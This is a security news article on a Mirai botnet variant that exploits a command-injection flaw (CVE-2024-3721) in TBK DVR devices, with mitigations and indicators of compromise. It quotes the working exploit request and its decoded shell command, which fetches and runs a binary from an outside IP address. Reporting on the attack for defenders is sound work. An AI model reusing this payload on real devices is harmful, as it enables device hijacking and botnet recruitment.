New Mirai Variant Exploits TBK DVR Flaw for Remote Code Execution

2 minutes ago

The latest wave of Mirai botnet activity has resurfaced with a refined attack chain exploiting CVE-2024-3721, a critical command injection vulnerability in TBK DVR-4104 and DVR-4216 devices.

This campaign leverages unpatched firmware to deploy a modified Mirai variant designed for IoT device hijacking and DDoS operations.

Exploitation Vector & Payload Delivery

Attackers exploit the vulnerability via crafted HTTP POST requests targeting the /device.rsp endpoint.

The injected command downloads and executes an ARM32 binary:

textPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F42.112.26.36%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1

The decoded shell script executes:

bashcd /tmp; rm arm7; wget http://42.112.26[.]36/arm7; chmod 777 *; ./arm7 tbk

This streamlined payload skips architecture reconnaissance, specifically targeting ARM32-based DVR systems.

Malware Modifications & Evasion Tactics

The Mirai variant incorporates several upgrades:

1. RC4 String Encryption

  • Uses XOR-encrypted RC4 key: 6e7976666525a97639777d2d7f303177
  • Decrypted strings stored in a custom DataDecrypted structure for runtime access

2. Anti-Analysis Checks

  • Scans /proc/[PID]/cmdline for VMware/QEMU indicators
  • Validates execution path against hardcoded directories: text/dev/shm /tmp /var/run

3. Process Whitelisting
Terminates competing malware processes like Hajime, Anarchy, and Mozi to monopolize device resources.

Infection Metrics & Mitigation

Telemetry data reveals concentrated infections in China, India, Egypt, Ukraine, Russia, Turkey, and Brazil.

Over 50,000 exposed DVR devices remain vulnerable globally, with attackers actively scanning Shodan-listed targets.

Mitigation Strategy Implementation
Firmware Patching Apply TBK’s 20240412+ updates
Network Segmentation Isolate DVRs from critical infrastructure
Input Sanitization Block special characters in mdb/mdc parameters

Kaspersky products detect this variant as HEUR:Backdoor.Linux.Mirai and HEUR:Backdoor.Linux.Gafgyt.

Device owners should prioritize firmware updates and consider factory resets for compromised units.

Indicators of Compromise

textIPs: 116.203.104[.]203, 130.61.64[.]122, 161.97.219[.]84  
MD5: 011a406e89e603e93640b10325ebbdc8, 24fd043f9175680d0c061b28a2801dfc

This campaign underscores the persistent threat of legacy IoT vulnerabilities in industrial surveillance systems.

The Mirai codebase’s continued evolution demonstrates threat actors’ ability to weaponize decade-old malware through strategic modifications.

Tags
2 minutes ago

Related Articles

High-Severity Firmware Security Flaws Left Unpatched in HP Enterprise Devices

September 12, 2022

GeoServer Vulnerability Targeted by Hackers to Deliver Backdoors and Botnet Malware

September 6, 2024

GHOSTENGINE Exploits Vulnerable Drivers to Disable EDRs in Cryptojacking Attack

May 22, 2024

Realtek Vulnerability Under Attack: Over 134 Million Attempts to Hack IoT Devices

January 30, 2023
© Copyright 2025, All Rights Reserved  |  PlanetJon
Back to top button